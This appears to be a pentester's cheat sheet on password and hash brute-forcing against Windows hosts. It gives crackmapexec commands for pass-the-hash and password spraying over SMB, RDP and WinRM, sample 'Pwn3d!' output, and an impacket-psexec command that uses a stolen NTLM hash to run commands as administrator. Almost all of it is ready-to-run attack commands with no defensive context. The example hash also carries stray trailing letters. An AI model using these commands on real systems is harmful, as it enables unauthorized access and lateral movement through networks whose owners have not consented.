password/hash bruteforcing

password/hash bruteforcing

• crackmapexec smb -H ee0c207898a5bccc01f38115019ca2fb -u administrator --local-auth 10.21.1.20-24

  • example output: SCLIENT\administrator:ee0c207898a5bccc01f38115019ca2fbtrew (Pwn3d!) - already compromised SCLIENT7\administrator:ee0c207898a5bccc01f38115019ca2fbtrew (Pwn3d!)

  • impacket-psexec 'SCLIENT7/administrator@10.21.1.24' -hashes ':ee0c207898a5bccc01f38115019ca2fbtrew’

• Also , when machine is part of Domain

  • crackmapexec smb -p Test! -u sario -d NETMED 172.16.124.82-83

• Other service

  • RDP

    • crackmapexec rdp -p Test! -u sario -d NETMED 172.16.124.82-83

  • Winrm

    • crackmapexec winrm -p Test! -u sario -d NETMED 172.16.124.82-83